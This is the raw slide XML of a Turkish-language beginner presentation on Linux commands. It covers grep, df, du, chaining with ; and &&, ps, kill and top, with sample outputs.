            <a:off x="4413650" y="679925"/>
            <a:ext cx="4488600" cy="39765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Kelime arama komutudur. Verilen data içerisinden istenilen kelimeye uygun satırı getirir.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Bir dizindeki tüm .txt dosyalarında "ara_kelime" ifadesini aramak</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grep "ara_kelime" *.txt</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Parametreleri:</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-i: Büyük/küçük harf duyarlılığını yok sayar.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-r veya -R: Belirtilen dizinler altındaki tüm dosyalarda arama yapar.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-n: Eşleşen satırların numaralarını gösterir.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-v: Belirtilen içeriği içermeyen satırları gösterir.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Google Shape;313;p41"/>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ grep "ara_kelime" *.txt</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17" name="Shape 317"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="Google Shape;318;p42"/>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Disk kullanım durumu listeleme komutu: df</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="Google Shape;319;p42"/>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Filesystem      Size  Used Avail Use% Mounted on</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overlay         108G   27G   82G  25% /</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tmpfs            64M     0   64M   0% /dev</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shm             5.8G     0  5.8G   0% /dev/shm</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tmpfs           6.4G  7.4M  6.4G   1% /var/colab</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/dev/sda1        71G   54G   17G  77% /etc/hosts</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tmpfs           6.4G     0  6.4G   0% /proc/acpi</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tmpfs           6.4G     0  6.4G   0% /proc/scsi</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tmpfs           6.4G     0  6.4G   0% /sys/firmware</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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="Google Shape;320;p42"/>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df -h</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="321" name="Google Shape;321;p42"/>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 dosya sistemlerinin disk kullanımını raporlar.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Sistemdeki farklı dosya sistemlerinin (örneğin, /, /dev/shm, /data) kullanılan ve boş alanlarını, toplam boyutlarını, kullanım yüzdesini ve bağlı oldukları yerleri gösterir. </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-h parametresi kullanıldığı için, boyutlar insan tarafından daha kolay okunabilir bir formatta (gigabyte, megabayt) gösterilmiştir.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Parametreleri:</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-h: human readable </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>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5" name="Shape 325"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Google Shape;326;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="-15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Bir dizinin d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>isk kullanım durumu listeleme komutu: du</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Google Shape;327;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1217400"/>
            <a:ext cx="4115400" cy="514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12G     /path/to/dizin</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Google Shape;328;p43"/>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du -sh /path/to/dizin</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Google Shape;329;p43"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>bir dizinin toplam disk kullanımını (disk alanını) gösterir ve daha temiz bir çıktı sunar.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Parametreleri:</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-h parametresi kullanıldığı için, boyutlar insan tarafından daha kolay okunabilir bir formatta (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>gigabyte</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>megabyte</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>) gösterilmiştir.</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>toplam disk kullanımını tek bir satırda gösterir</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="330" name="Google Shape;330;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="18882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du -h /path/to/dizin</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331" name="Google Shape;331;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="2479250"/>
            <a:ext cx="4115400" cy="2089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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>4.0K    ./belgeler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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>8.0K    ./indirilenler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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>12K     ./masaustu</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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>20K     ./musik</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US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>4.0K    ./resimler</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40K     ./toplam_kullanım</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="10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35" name="Shape 335"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Google Shape;336;p4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Zincirleme komut çalıştırma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: ; ve &amp;&amp;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="Google Shape;337;p44"/>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ls -alh ; rm file.txt ; ls</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Google Shape;338;p44"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Belirtilen</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> komutları sırayla çalıştırır.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&amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Belirtilen komutları sırayla herhangi bir hata oluşuna kadar çalıştırır.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Konfigürasyon işlemlerini hızlı bir şekilde gerçekleştirmek için genellikle "./configure &amp;&amp; make" komutları kullanılır. Bu komutlar arasındaki "&amp;&amp;" operatörü, ilk komutun başarıyla tamamlanması durumunda ikinci komutun çalıştırılmasını sağlar. Ancak, konfigürasyon sırasında bir hata oluştuğunda işlem otomatik olarak sona erer.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339" name="Google Shape;339;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1280200"/>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ls -alh &amp;&amp; rm file.txt &amp;&amp; ls</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3" name="Shape 343"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="Google Shape;344;p4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Çalışan işlemleri listeleme komutu: ps</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345" name="Google Shape;345;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1217400"/>
            <a:ext cx="4115400" cy="3618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PID TTY TIME CMD</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1234 pts/0 00:00:00 bash</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5678 pts/0 00:00:00 ps</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FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Google Shape;346;p45"/>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ps -aux</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Google Shape;347;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413650" y="679925"/>
            <a:ext cx="4488600" cy="4156200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr"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komut, çalışan işlemleri listeler.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Parametreleri:</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-a: Tüm kullanıcıların işlemlerini gösterir.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-u: Belirtilen kullanıcının işlemlerini gösterir.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-x: Terminalden başlatılan işlemleri göstermez.</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 Tüm işlemleri gösterir.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-f: Tam formatlı çıktı sağlar, yani daha fazla bilgi içerir.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ps aux: CPU ve bellek kullanım yüzdeleriyle birlikte tüm işlemleri listeler.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ps -ef: Tüm işlemleri geniş bir formatta listeler.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pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="Google Shape;51;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="6544" l="3795" r="7109" t="6665"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177250" y="1714475"/>
            <a:ext cx="2011675" cy="1645925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Google Shape;52;p10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4888075" y="2245350"/>
            <a:ext cx="3803700" cy="43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3400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux kısa tarihçe</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53" name="Google Shape;53;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="546700" y="1393225"/>
            <a:ext cx="3803698" cy="21386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1" name="Shape 351"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Google Shape;352;p4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Çalışan işlemleri sonlandırma komutu: kill</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Google Shape;353;p46"/>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PID TTY TIME CMD</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000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>5678 pts/0 00:00:00 ps</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000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="354" name="Google Shape;354;p4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kill -9 1234</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Google Shape;355;p46"/>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komut, belirtilen PID numarasına sahip işlemi sonlandırır.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Parametreleri:</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-9:SIGKILL sinyalini temsil eder. Bu sinyal, diğer sinyallerin aksine, sürecin güvenli bir şekilde kapatılmasını beklemeksizin süreci hemen durdurur.</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59" name="Shape 359"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360" name="Google Shape;360;p47"/>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 kaynaklarını izleme komutu: top</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="Google Shape;361;p47"/>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Tasks: 139 total, 1 running, 87 sleeping, 0 stopped, 1 zombie</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%Cpu(s): 0.0 us, 0.0 sy, 0.0 ni,100.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st</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MiB Mem : 15859.7 total, 1116.7 free, 11245.7 used, 3476.7 buff/cache</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MiB Swap: 16384.0 total, 15738.8 free, 645.2 used. 3356.7 avail Mem</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PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND</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3526 john 20 0 2478208 678476 63500 S 0.0 4.2 4:15.50 firefox</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1083 root 20 0 0 0 0 Z 0.0 0.0 0:00.00 zombie</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890 mysql 20 0 1552776 273952 25364 S 0.0 1.7 23:18.43 mysqld</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726 root 20 0 30572 6248 5152 S 0.0 0.0 22:33.19 systemd-journal</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772 root 20 0 243900 5708 3908 S 0.0 0.0 18:44.70 NetworkManager</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2911 john 20 0 908776 147840 90044 S 0.0 0.9 0:01.57 gnome-terminal-</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800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>2364 john 20 0 1449552 34812 26156 S 0.0 0.2 0:09.60 gvfsd-http</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="8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sz="800">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="Google Shape;362;p47"/>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top</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="Google Shape;363;p47"/>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Linux/Unix sistemlerinde sistem kaynaklarını izlemek için kullanılan bir araçtır. Bu komut, sistemin CPU kullanımı, bellek kullanımı, işlem sayısı ve diğer kaynak kullanım istatistiklerini gösterir.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PID 1083'e sahip bir zombi işlemi var. Bu işlem, hafızada herhangi bir yer kaplamaz, ancak hala sistem kaynaklarını kullanabilir ve ebeveyn süreci tarafından sonlandırılmayı bekleyebilir.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67" name="Shape 367"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Google Shape;368;p4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Ağ ve network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> komutları</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Google Shape;369;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695300" y="1280550"/>
            <a:ext cx="4300800" cy="3386400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="434343"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
